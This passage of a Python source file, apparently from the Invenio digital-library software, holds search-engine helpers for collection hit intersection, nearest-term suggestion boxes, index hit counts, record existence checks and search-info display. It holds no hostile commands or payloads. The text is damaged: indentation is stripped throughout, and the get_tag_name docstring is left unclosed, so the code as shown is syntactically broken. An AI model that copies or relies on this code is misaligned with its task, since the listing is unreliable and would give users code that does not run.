colls_to_be_displayed = [coll for coll in current_coll_children if coll in colls or coll in permitted_restricted_collections]
colls_to_be_displayed.extend([coll for coll in colls if coll not in colls_to_be_displayed])
records_that_can_be_displayed = get_records_that_can_be_displayed(
user_info,
hitset_in_any_collection,
current_coll, colls)
for coll in colls_to_be_displayed:
results[coll] = results.get(coll, intbitset()).union_update(records_that_can_be_displayed & get_collection_reclist(coll))
results_nbhits += len(results[coll])
if results_nbhits == 0:
# no hits found, try to search in Home and restricted and/or hidden collections:
results = {}
results_in_Home = records_that_can_be_displayed & get_collection_reclist(CFG_SITE_NAME)
results_in_restricted_collections = intbitset()
results_in_hidden_collections = intbitset()
for coll in permitted_restricted_collections:
if not get_coll_ancestors(coll): # hidden collection
results_in_hidden_collections.union_update(records_that_can_be_displayed & get_collection_reclist(coll))
else:
results_in_restricted_collections.union_update(records_that_can_be_displayed & get_collection_reclist(coll))
# in this way, we do not count twice, records that are both in Home collection and in a restricted collection
total_results = len(results_in_Home.union(results_in_restricted_collections))
if total_results > 0:
# some hits found in Home and/or restricted collections, so propose this search:
if of.startswith("h") and display_nearest_terms_box:
url = websearch_templates.build_search_url(req.argd, cc=CFG_SITE_NAME, c=[])
len_colls_to_display = len(colls_to_be_displayed)
# trim the list of collections to first two, since it might get very large
write_warning(_("No match found in collection %(x_collection)s. Other collections gave %(x_url_open)s%(x_nb_hits)d hits%(x_url_close)s.") %\
{'x_collection': '<em>' + \
string.join([get_coll_i18nname(coll, ln, False) for coll in colls_to_be_displayed[:2]], ', ') + \
(len_colls_to_display > 2 and ' et al' or '') + '</em>',
'x_url_open': '<a class="nearestterms" href="%s">' % (url),
'x_nb_hits': total_results,
'x_url_close': '</a>'}, req=req)
                    # display the whole list of collections in a comment
if len_colls_to_display > 2:
write_warning("<!--No match found in collection <em>%(x_collection)s</em>.-->" %\
{'x_collection': string.join([get_coll_i18nname(coll, ln, False) for coll in colls_to_be_displayed], ', ')},
req=req)
else:
            # no hits found: either the user is looking for a document and does not have the rights,
            # or the user is looking for a hidden document:
if of.startswith("h") and display_nearest_terms_box:
if len(results_in_hidden_collections) > 0:
write_warning(_("No public collection matched your query. "
"If you were looking for a hidden document, please type "
"the correct URL for this record."), req=req)
else:
write_warning(_("No public collection matched your query. "
"If you were looking for a non-public document, please choose "
"the desired restricted collection first."), req=req)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 4: intersecting with collection universe gave %d hits." % results_nbhits, req=req)
write_warning("Search stage 4: execution took %.2f seconds." % (t2 - t1), req=req)
return results
def intersect_results_with_hitset(req, results, hitset, ap=0, aptext="", of="hb"):
"""Return intersection of search 'results' (a dict of hitsets
with collection as key) with the 'hitset', i.e. apply
'hitset' intersection to each collection within search
'results'.
    If the final set would be empty and 'ap'
    (approximate pattern) is true, then print the 'aptext' warning
    and return the original 'results' set unchanged. If 'ap' is
    false, return an empty results set.
"""
if ap:
results_ap = copy.deepcopy(results)
else:
results_ap = {} # will return empty dict in case of no hits found
nb_total = 0
final_results = {}
for coll in results.keys():
final_results[coll] = results[coll].intersection(hitset)
nb_total += len(final_results[coll])
if nb_total == 0:
if of.startswith("h"):
write_warning(aptext, req=req)
final_results = results_ap
return final_results
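# Hedged sketch of intersect_results_with_hitset with made-up hitsets:
#
#     results = {'Articles': intbitset([1, 2, 3]), 'Books': intbitset([4])}
#     final = intersect_results_with_hitset(req, results, intbitset([2, 3]),
#                                           ap=1, aptext="nothing found...")
#     # -> {'Articles': intbitset([2, 3]), 'Books': intbitset([])}
#     # if the intersection had been empty everywhere and ap were true, the
#     # original 'results' dict would have been returned instead.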
def create_similarly_named_authors_link_box(author_name, ln=CFG_SITE_LANG):
"""Return a box similar to ``Not satisfied...'' one by proposing
author searches for similar names. Namely, take AUTHOR_NAME
    and the first initial of the first name (after the comma) and look
    into the author index to see whether authors with e.g. middle names exist.
Useful mainly for CERN Library that sometimes contains name
forms like Ellis-N, Ellis-Nick, Ellis-Nicolas all denoting the
same person. The box isn't proposed if no similarly named
authors are found to exist.
"""
# return nothing if not configured:
if CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX == 0:
return ""
# return empty box if there is no initial:
if re.match(r'[^ ,]+, [^ ]', author_name) is None:
return ""
# firstly find name comma initial:
author_name_to_search = re.sub(r'^([^ ,]+, +[^ ,]).*$', '\\1', author_name)
# secondly search for similar name forms:
similar_author_names = {}
for name in author_name_to_search, strip_accents(author_name_to_search):
for tag in get_field_tags("author"):
# deduce into which bibxxx table we will search:
digit1, digit2 = int(tag[0]), int(tag[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
if len(tag) != 6 or tag[-1:]=='%':
# only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value LIKE %%s AND bx.tag LIKE %%s""" % bx,
(name + "%", tag + "%"))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value LIKE %%s AND bx.tag=%%s""" % bx,
(name + "%", tag))
for row in res:
similar_author_names[row[0]] = 1
# remove the original name and sort the list:
try:
del similar_author_names[author_name]
except KeyError:
pass
# thirdly print the box:
out = ""
if similar_author_names:
out_authors = similar_author_names.keys()
out_authors.sort()
tmp_authors = []
for out_author in out_authors:
nbhits = get_nbhits_in_bibxxx(out_author, "author")
if nbhits:
tmp_authors.append((out_author, nbhits))
out += websearch_templates.tmpl_similar_author_names(
authors=tmp_authors, ln=ln)
return out
def create_nearest_terms_box(urlargd, p, f, t='w', n=5, ln=CFG_SITE_LANG, intro_text_p=True):
"""Return text box containing list of 'n' nearest terms above/below 'p'
for the field 'f' for matching type 't' (words/phrases) in
language 'ln'.
    Propose new searches according to `urlargd' with the new words.
If `intro_text_p' is true, then display the introductory message,
otherwise print only the nearest terms in the box content.
"""
# load the right message language
_ = gettext_set_language(ln)
if not CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS:
return _("Your search did not match any records. Please try again.")
nearest_terms = []
if not p: # sanity check
p = "."
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
index_id = get_index_id_from_field(f)
if f == 'fulltext':
if CFG_SOLR_URL:
return _("No match found, please enter different search terms.")
else:
# FIXME: workaround for not having native phrase index yet
t = 'w'
# special indexes:
if f == 'refersto':
return _("There are no records referring to %s.") % cgi.escape(p)
if f == 'citedby':
return _("There are no records cited by %s.") % cgi.escape(p)
# look for nearest terms:
if t == 'w':
nearest_terms = get_nearest_terms_in_bibwords(p, f, n, n)
if not nearest_terms:
return _("No word index is available for %s.") % \
('<em>' + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + '</em>')
else:
nearest_terms = []
if index_id:
nearest_terms = get_nearest_terms_in_idxphrase(p, index_id, n, n)
if f == 'datecreated' or f == 'datemodified':
nearest_terms = get_nearest_terms_in_bibrec(p, f, n, n)
if not nearest_terms:
nearest_terms = get_nearest_terms_in_bibxxx(p, f, n, n)
if not nearest_terms:
return _("No phrase index is available for %s.") % \
('<em>' + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + '</em>')
terminfo = []
for term in nearest_terms:
if t == 'w':
hits = get_nbhits_in_bibwords(term, f)
else:
if index_id:
hits = get_nbhits_in_idxphrases(term, f)
elif f == 'datecreated' or f == 'datemodified':
hits = get_nbhits_in_bibrec(term, f)
else:
hits = get_nbhits_in_bibxxx(term, f)
argd = {}
argd.update(urlargd)
# check which fields contained the requested parameter, and replace it.
for (px, fx) in ('p', 'f'), ('p1', 'f1'), ('p2', 'f2'), ('p3', 'f3'):
if px in argd:
argd_px = argd[px]
if t == 'w':
                    # p was stripped of accents, so do the same here:
argd_px = strip_accents(argd_px)
#argd[px] = string.replace(argd_px, p, term, 1)
#we need something similar, but case insensitive
pattern_index = string.find(argd_px.lower(), p.lower())
if pattern_index > -1:
argd[px] = argd_px[:pattern_index] + term + argd_px[pattern_index+len(p):]
break
#this is doing exactly the same as:
#argd[px] = re.sub('(?i)' + re.escape(p), term, argd_px, 1)
#but is ~4x faster (2us vs. 8.25us)
terminfo.append((term, hits, argd))
intro = ""
if intro_text_p: # add full leading introductory text
if f:
intro = _("Search term %(x_term)s inside index %(x_index)s did not match any record. Nearest terms in any collection are:") % \
{'x_term': "<em>" + cgi.escape(p.startswith("%") and p.endswith("%") and p[1:-1] or p) + "</em>",
'x_index': "<em>" + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + "</em>"}
else:
intro = _("Search term %s did not match any record. Nearest terms in any collection are:") % \
("<em>" + cgi.escape(p.startswith("%") and p.endswith("%") and p[1:-1] or p) + "</em>")
return websearch_templates.tmpl_nearest_term_box(p=p, ln=ln, f=f, terminfo=terminfo,
intro=intro)
def get_nearest_terms_in_bibwords(p, f, n_below, n_above):
"""Return list of +n -n nearest terms to word `p' in index for field `f'."""
nearest_words = [] # will hold the (sorted) list of nearest words to return
# deduce into which bibwordsX table we will search:
bibwordsX = "idxWORD%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
else:
return nearest_words
# firstly try to get `n' closest words above `p':
res = run_sql("SELECT term FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % bibwordsX,
(p, n_above))
for row in res:
nearest_words.append(row[0])
nearest_words.reverse()
# secondly insert given word `p':
nearest_words.append(p)
# finally try to get `n' closest words below `p':
res = run_sql("SELECT term FROM %s WHERE term>%%s ORDER BY term ASC LIMIT %%s" % bibwordsX,
(p, n_below))
for row in res:
nearest_words.append(row[0])
return nearest_words
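# Hedged sketch of get_nearest_terms_in_bibwords: for p='ellis' in the
# 'author' word index, with n_above=1 and n_below=2 it could return e.g.
#
#     ['elliot', 'ellis', 'ellison', 'ellwood']
#
# i.e. up to n_above terms alphabetically before 'p', then 'p' itself, then
# up to n_below terms after it (terms above are made up).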
def get_nearest_terms_in_idxphrase(p, index_id, n_below, n_above):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field idxPHRASE table,
regardless of collection.
Return list of [phrase1, phrase2, ... , phrase_n]."""
if CFG_INSPIRE_SITE and index_id in (3, 15): # FIXME: workaround due to new fuzzy index
return [p,]
idxphraseX = "idxPHRASE%02dF" % index_id
res_above = run_sql("SELECT term FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % idxphraseX, (p, n_above))
res_above = map(lambda x: x[0], res_above)
res_above.reverse()
res_below = run_sql("SELECT term FROM %s WHERE term>=%%s ORDER BY term ASC LIMIT %%s" % idxphraseX, (p, n_below))
res_below = map(lambda x: x[0], res_below)
return res_above + res_below
def get_nearest_terms_in_idxphrase_with_collection(p, index_id, n_below, n_above, collection):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field idxPHRASE table,
considering the collection (intbitset).
Return list of [(phrase1, hitset), (phrase2, hitset), ... , (phrase_n, hitset)]."""
idxphraseX = "idxPHRASE%02dF" % index_id
res_above = run_sql("SELECT term,hitlist FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % idxphraseX, (p, n_above * 3))
res_above = [(term, intbitset(hitlist) & collection) for term, hitlist in res_above]
res_above = [(term, len(hitlist)) for term, hitlist in res_above if hitlist]
res_below = run_sql("SELECT term,hitlist FROM %s WHERE term>=%%s ORDER BY term ASC LIMIT %%s" % idxphraseX, (p, n_below * 3))
res_below = [(term, intbitset(hitlist) & collection) for term, hitlist in res_below]
res_below = [(term, len(hitlist)) for term, hitlist in res_below if hitlist]
res_above.reverse()
return res_above[-n_above:] + res_below[:n_below]
def get_nearest_terms_in_bibxxx(p, f, n_below, n_above):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field f, regardless
of collection.
Return list of [phrase1, phrase2, ... , phrase_n]."""
## determine browse field:
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
# FIXME: quick hack for the journal index
if f == 'journal':
return get_nearest_terms_in_bibwords(p, f, n_below, n_above)
## We are going to take max(n_below, n_above) as the number of
    ## values to fetch from bibXXx. This is needed to work around
## MySQL UTF-8 sorting troubles in 4.0.x. Proper solution is to
## use MySQL 4.1.x or our own idxPHRASE in the future.
index_id = get_index_id_from_field(f)
if index_id:
return get_nearest_terms_in_idxphrase(p, index_id, n_below, n_above)
n_fetch = 2*max(n_below, n_above)
## construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
## start browsing to fetch list of hits:
browsed_phrases = {} # will hold {phrase1: 1, phrase2: 1, ..., phraseN: 1} dict of browsed phrases (to make them unique)
# always add self to the results set:
browsed_phrases[p.startswith("%") and p.endswith("%") and p[1:-1] or p] = 1
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
# firstly try to get `n' closest phrases above `p':
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value<%%s AND bx.tag LIKE %%s
ORDER BY bx.value DESC LIMIT %%s""" % bx,
(p, t + "%", n_fetch))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value<%%s AND bx.tag=%%s
ORDER BY bx.value DESC LIMIT %%s""" % bx,
(p, t, n_fetch))
for row in res:
browsed_phrases[row[0]] = 1
# secondly try to get `n' closest phrases equal to or below `p':
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value>=%%s AND bx.tag LIKE %%s
ORDER BY bx.value ASC LIMIT %%s""" % bx,
(p, t + "%", n_fetch))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value>=%%s AND bx.tag=%%s
ORDER BY bx.value ASC LIMIT %%s""" % bx,
(p, t, n_fetch))
for row in res:
browsed_phrases[row[0]] = 1
    # select the first n phrases only: (this is needed as we were searching
    # in many different tables and so may have gathered more than n
    # phrases; this of course won't be needed when we shall have
    # one ACC table only for a given field):
phrases_out = browsed_phrases.keys()
phrases_out.sort(lambda x, y: cmp(string.lower(strip_accents(x)),
string.lower(strip_accents(y))))
# find position of self:
try:
idx_p = phrases_out.index(p)
except:
idx_p = len(phrases_out)/2
# return n_above and n_below:
return phrases_out[max(0, idx_p-n_above):idx_p+n_below]
def get_nearest_terms_in_bibrec(p, f, n_below, n_above):
"""Return list of nearest terms and counts from bibrec table.
p is usually a date, and f either datecreated or datemodified.
    Note: below/above count is approximate, not strictly respected.
"""
col = 'creation_date'
if f == 'datemodified':
col = 'modification_date'
res_above = run_sql("""SELECT DATE_FORMAT(%s,'%%%%Y-%%%%m-%%%%d %%%%H:%%%%i:%%%%s')
FROM bibrec WHERE %s < %%s
ORDER BY %s DESC LIMIT %%s""" % (col, col, col),
(p, n_above))
res_below = run_sql("""SELECT DATE_FORMAT(%s,'%%%%Y-%%%%m-%%%%d %%%%H:%%%%i:%%%%s')
FROM bibrec WHERE %s > %%s
ORDER BY %s ASC LIMIT %%s""" % (col, col, col),
(p, n_below))
out = set([])
for row in res_above:
out.add(row[0])
for row in res_below:
out.add(row[0])
out_list = list(out)
out_list.sort()
return list(out_list)
def get_nbhits_in_bibrec(term, f):
"""Return number of hits in bibrec table. term is usually a date,
and f is either 'datecreated' or 'datemodified'."""
col = 'creation_date'
if f == 'datemodified':
col = 'modification_date'
res = run_sql("SELECT COUNT(*) FROM bibrec WHERE %s LIKE %%s" % (col,),
(term + '%',))
return res[0][0]
def get_nbhits_in_bibwords(word, f):
"""Return number of hits for word 'word' inside words index for field 'f'."""
out = 0
# deduce into which bibwordsX table we will search:
bibwordsX = "idxWORD%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
else:
return 0
if word:
res = run_sql("SELECT hitlist FROM %s WHERE term=%%s" % bibwordsX,
(word,))
for hitlist in res:
out += len(intbitset(hitlist[0]))
return out
def get_nbhits_in_idxphrases(word, f):
"""Return number of hits for word 'word' inside phrase index for field 'f'."""
out = 0
    # deduce into which idxPHRASE table we will search:
idxphraseX = "idxPHRASE%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
idxphraseX = "idxPHRASE%02dF" % index_id
else:
return 0
if word:
res = run_sql("SELECT hitlist FROM %s WHERE term=%%s" % idxphraseX,
(word,))
for hitlist in res:
out += len(intbitset(hitlist[0]))
return out
def get_nbhits_in_bibxxx(p, f, in_hitset=None):
"""Return number of hits for word 'word' inside words index for field 'f'."""
## determine browse field:
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
# FIXME: quick hack for the journal index
if f == 'journal':
return get_nbhits_in_bibwords(p, f)
## construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
# start searching:
recIDs = {} # will hold dict of {recID1: 1, recID2: 1, ..., } (unique recIDs, therefore)
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bibx.id_bibrec FROM %s AS bibx, %s AS bx
WHERE bx.value=%%s AND bx.tag LIKE %%s
AND bibx.id_bibxxx=bx.id""" % (bibx, bx),
(p, t + "%"))
else:
res = run_sql("""SELECT bibx.id_bibrec FROM %s AS bibx, %s AS bx
WHERE bx.value=%%s AND bx.tag=%%s
AND bibx.id_bibxxx=bx.id""" % (bibx, bx),
(p, t))
for row in res:
recIDs[row[0]] = 1
if in_hitset is None:
nbhits = len(recIDs)
else:
nbhits = len(intbitset(recIDs.keys()).intersection(in_hitset))
return nbhits
def get_mysql_recid_from_aleph_sysno(sysno):
"""Returns DB's recID for ALEPH sysno passed in the argument (e.g. "002379334CER").
Returns None in case of failure."""
out = None
res = run_sql("""SELECT bb.id_bibrec FROM bibrec_bib97x AS bb, bib97x AS b
WHERE b.value=%s AND b.tag='970__a' AND bb.id_bibxxx=b.id""",
(sysno,))
if res:
out = res[0][0]
return out
def guess_primary_collection_of_a_record(recID):
"""Return primary collection name a record recid belongs to, by
testing 980 identifier.
May lead to bad guesses when a collection is defined dynamically
via dbquery.
In that case, return 'CFG_SITE_NAME'."""
out = CFG_SITE_NAME
dbcollids = get_fieldvalues(recID, "980__a")
for dbcollid in dbcollids:
variants = ("collection:" + dbcollid,
'collection:"' + dbcollid + '"',
"980__a:" + dbcollid,
'980__a:"' + dbcollid + '"',
'980:' + dbcollid ,
'980:"' + dbcollid + '"')
res = run_sql("SELECT name FROM collection WHERE dbquery IN (%s,%s,%s,%s,%s,%s)", variants)
if res:
out = res[0][0]
break
if CFG_CERN_SITE:
recID = int(recID)
# dirty hack for ATLAS collections at CERN:
if out in ('ATLAS Communications', 'ATLAS Internal Notes'):
for alternative_collection in ('ATLAS Communications Physics',
'ATLAS Communications General',
'ATLAS Internal Notes Physics',
'ATLAS Internal Notes General',):
if recID in get_collection_reclist(alternative_collection):
return alternative_collection
# dirty hack for FP
FP_collections = {'DO': ['Current Price Enquiries', 'Archived Price Enquiries'],
'IT': ['Current Invitation for Tenders', 'Archived Invitation for Tenders'],
'MS': ['Current Market Surveys', 'Archived Market Surveys']}
fp_coll_ids = [coll for coll in dbcollids if coll in FP_collections]
for coll in fp_coll_ids:
for coll_name in FP_collections[coll]:
if recID in get_collection_reclist(coll_name):
return coll_name
return out
_re_collection_url = re.compile('/collection/(.+)')
def guess_collection_of_a_record(recID, referer=None, recreate_cache_if_needed=True):
"""Return collection name a record recid belongs to, by first testing
the referer URL if provided and otherwise returning the
primary collection."""
if referer:
dummy, hostname, path, dummy, query, dummy = urlparse.urlparse(referer)
#requests can come from different invenio installations, with different collections
if CFG_SITE_URL.find(hostname) < 0:
return guess_primary_collection_of_a_record(recID)
g = _re_collection_url.match(path)
if g:
name = urllib.unquote_plus(g.group(1))
#check if this collection actually exist (also normalize the name if case-insensitive)
name = get_coll_normalised_name(name)
if name and recID in get_collection_reclist(name):
return name
elif path.startswith('/search'):
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
query = cgi.parse_qs(query)
for name in query.get('cc', []) + query.get('c', []):
name = get_coll_normalised_name(name)
if name and recID in get_collection_reclist(name, recreate_cache_if_needed=False):
return name
return guess_primary_collection_of_a_record(recID)
def is_record_in_any_collection(recID, recreate_cache_if_needed=True):
"""Return True if the record belongs to at least one collection. This is a
good, although not perfect, indicator to guess if webcoll has already run
after this record has been entered into the system.
"""
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
for name in collection_reclist_cache.cache.keys():
if recID in get_collection_reclist(name, recreate_cache_if_needed=False):
return True
return False
def get_all_collections_of_a_record(recID, recreate_cache_if_needed=True):
"""Return all the collection names a record belongs to.
Note this function is O(n_collections)."""
ret = []
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
for name in collection_reclist_cache.cache.keys():
if recID in get_collection_reclist(name, recreate_cache_if_needed=False):
ret.append(name)
return ret
def get_tag_name(tag_value, prolog="", epilog=""):
"""Return tag name from the known tag value, by looking up the 'tag' table.
Return empty string in case of failure.
    Example: input='100__%', output='first author'.
out = ""
res = run_sql("SELECT name FROM tag WHERE value=%s", (tag_value,))
if res:
out = prolog + res[0][0] + epilog
return out
def get_fieldcodes():
"""Returns a list of field codes that may have been passed as 'search options' in URL.
Example: output=['subject','division']."""
out = []
res = run_sql("SELECT DISTINCT(code) FROM field")
for row in res:
out.append(row[0])
return out
def get_field_name(code):
"""Return the corresponding field_name given the field code.
e.g. reportnumber -> report number."""
res = run_sql("SELECT name FROM field WHERE code=%s", (code, ))
if res:
return res[0][0]
else:
return ""
def get_field_tags(field):
"""Returns a list of MARC tags for the field code 'field'.
Returns empty list in case of error.
Example: field='author', output=['100__%','700__%']."""
out = []
query = """SELECT t.value FROM tag AS t, field_tag AS ft, field AS f
WHERE f.code=%s AND ft.id_field=f.id AND t.id=ft.id_tag
ORDER BY ft.score DESC"""
res = run_sql(query, (field, ))
for val in res:
out.append(val[0])
return out
def get_merged_recid(recID):
""" Return the record ID of the record with
which the given record has been merged.
@param recID: deleted record recID
@type recID: int
@return: merged record recID
@rtype: int or None
"""
merged_recid = None
for val in get_fieldvalues(recID, "970__d"):
try:
merged_recid = int(val)
break
except ValueError:
pass
return merged_recid
def record_exists(recID):
"""Return 1 if record RECID exists.
Return 0 if it doesn't exist.
Return -1 if it exists but is marked as deleted.
"""
out = 0
res = run_sql("SELECT id FROM bibrec WHERE id=%s", (recID,), 1)
if res:
try: # if recid is '123foo', mysql will return id=123, and we don't want that
recID = int(recID)
except ValueError:
return 0
# record exists; now check whether it isn't marked as deleted:
dbcollids = get_fieldvalues(recID, "980__%")
if ("DELETED" in dbcollids) or (CFG_CERN_SITE and "DUMMY" in dbcollids):
out = -1 # exists, but marked as deleted
else:
out = 1 # exists fine
return out
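# Hedged usage sketch for record_exists (the recID is illustrative):
#
#     status = record_exists(123)
#     if status == 1:      # record exists and is not deleted
#         ...
#     elif status == -1:   # record exists but is marked DELETED in 980__%
#         ...
#     else:                # 0: no such record
#         ...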
def record_empty(recID):
"""
Is this record empty, e.g. has only 001, waiting for integration?
@param recID: the record identifier.
@type recID: int
@return: 1 if the record is empty, 0 otherwise.
@rtype: int
"""
record = get_record(recID)
if record is None or len(record) < 2:
return 1
else:
return 0
def record_public_p(recID, recreate_cache_if_needed=True):
"""Return 1 if the record is public, i.e. if it can be found in the Home collection.
Return 0 otherwise.
"""
return recID in get_collection_reclist(CFG_SITE_NAME, recreate_cache_if_needed=recreate_cache_if_needed)
def get_creation_date(recID, fmt="%Y-%m-%d"):
"Returns the creation date of the record 'recID'."
out = ""
res = run_sql("SELECT DATE_FORMAT(creation_date,%s) FROM bibrec WHERE id=%s", (fmt, recID), 1)
if res:
out = res[0][0]
return out
def get_modification_date(recID, fmt="%Y-%m-%d"):
"Returns the date of last modification for the record 'recID'."
out = ""
res = run_sql("SELECT DATE_FORMAT(modification_date,%s) FROM bibrec WHERE id=%s", (fmt, recID), 1)
if res:
out = res[0][0]
return out
def print_search_info(p, f, sf, so, sp, rm, of, ot, collection=CFG_SITE_NAME, nb_found=-1, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
aas=0, ln=CFG_SITE_LANG, p1="", p2="", p3="", f1="", f2="", f3="", m1="", m2="", m3="", op1="", op2="",
sc=1, pl_in_url="",
d1y=0, d1m=0, d1d=0, d2y=0, d2m=0, d2d=0, dt="",
cpu_time=-1, middle_only=0, em=""):
"""Prints stripe with the information on 'collection' and 'nb_found' results and CPU time.
Also, prints navigation links (beg/next/prev/end) inside the results set.
    If middle_only is set to 1, it will only print the middle box information (beg/next/prev/end/etc) links.
This is suitable for displaying navigation links at the bottom of the search results page."""
if em != '' and EM_REPOSITORY["search_info"] not in em:
return ""
# sanity check:
if jrec < 1:
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
return websearch_templates.tmpl_print_search_info(
ln = ln,
collection = collection,
aas = aas,
collection_name = get_coll_i18nname(collection, ln, False),
collection_id = get_colID(collection),
middle_only = middle_only,
rg = rg,
nb_found = nb_found,
sf = sf,
so = so,
rm = rm,
of = of,
ot = ot,
p = p,
f = f,
p1 = p1,
p2 = p2,
p3 = p3,
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
op1 = op1,
op2 = op2,
pl_in_url = pl_in_url,
d1y = d1y,
d1m = d1m,
d1d = d1d,
d2y = d2y,
d2m = d2m,
d2d = d2d,
dt = dt,
jrec = jrec,
sc = sc,
sp = sp,
all_fieldcodes = get_fieldcodes(),
cpu_time = cpu_time,
)
def print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, collection=CFG_SITE_NAME, nb_found=-1, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
aas=0, ln=CFG_SITE_LANG, p1="", p2="", p3="", f1="", f2="", f3="", m1="", m2="", m3="", op1="", op2="",
sc=1, pl_in_url="",
d1y=0, d1m=0, d1d=0, d2y=0, d2m=0, d2d=0, dt="",
cpu_time=-1, middle_only=0, em=""):
"""Prints stripe with the information on 'collection' and 'nb_found' results and CPU time.
Also, prints navigation links (beg/next/prev/end) inside the results set.
    If middle_only is set to 1, it will only print the middle box information (beg/next/prev/end/etc) links.
This is suitable for displaying navigation links at the bottom of the search results page."""
if em != '' and EM_REPOSITORY["search_info"] not in em:
return ""
# sanity check:
if jrec < 1:
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
return websearch_templates.tmpl_print_hosted_search_info(
ln = ln,
collection = collection,
aas = aas,
collection_name = get_coll_i18nname(collection, ln, False),
collection_id = get_colID(collection),
middle_only = middle_only,
rg = rg,
nb_found = nb_found,
sf = sf,
so = so,
rm = rm,
of = of,
ot = ot,
p = p,
f = f,
p1 = p1,
p2 = p2,
p3 = p3,
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
op1 = op1,
op2 = op2,
pl_in_url = pl_in_url,
d1y = d1y,
d1m = d1m,
d1d = d1d,
d2y = d2y,
d2m = d2m,
d2d = d2d,
dt = dt,
jrec = jrec,
sc = sc,
sp = sp,
all_fieldcodes = get_fieldcodes(),
cpu_time = cpu_time,
)
def print_results_overview(colls, results_final_nb_total, results_final_nb, cpu_time, ln=CFG_SITE_LANG, ec=[], hosted_colls_potential_results_p=False, em=""):
"""Prints results overview box with links to particular collections below."""
if em != "" and EM_REPOSITORY["overview"] not in em:
return ""
new_colls = []
for coll in colls:
new_colls.append({
'id': get_colID(coll),
'code': coll,
'name': get_coll_i18nname(coll, ln, False),
})
return websearch_templates.tmpl_print_results_overview(
ln = ln,
results_final_nb_total = results_final_nb_total,
results_final_nb = results_final_nb,
cpu_time = cpu_time,
colls = new_colls,
ec = ec,
hosted_colls_potential_results_p = hosted_colls_potential_results_p,
)
def print_hosted_results(url_and_engine, ln=CFG_SITE_LANG, of=None, req=None, no_records_found=False, search_timed_out=False, limit=CFG_EXTERNAL_COLLECTION_MAXRESULTS, em = ""):
"""Prints the full results of a hosted collection"""
if of.startswith("h"):
if no_records_found:
return "<br />No results found."
if search_timed_out:
return "<br />The search engine did not respond in time."
return websearch_templates.tmpl_print_hosted_results(
url_and_engine=url_and_engine,
ln=ln,
of=of,
req=req,
limit=limit,
display_body = em == "" or EM_REPOSITORY["body"] in em,
display_add_to_basket = em == "" or EM_REPOSITORY["basket"] in em)
class BibSortDataCacher(DataCacher):
"""
Cache holding all structures created by bibsort
( _data, data_dict).
"""
def __init__(self, method_name):
self.method_name = method_name
self.method_id = 0
try:
res = run_sql("""SELECT id from bsrMETHOD where name = %s""", (self.method_name,))
except:
self.method_id = 0
if res and res[0]:
self.method_id = res[0][0]
else:
self.method_id = 0
def cache_filler():
method_id = self.method_id
alldicts = {}
if self.method_id == 0:
return {}
try:
res_data = run_sql("""SELECT data_dict_ordered from bsrMETHODDATA \
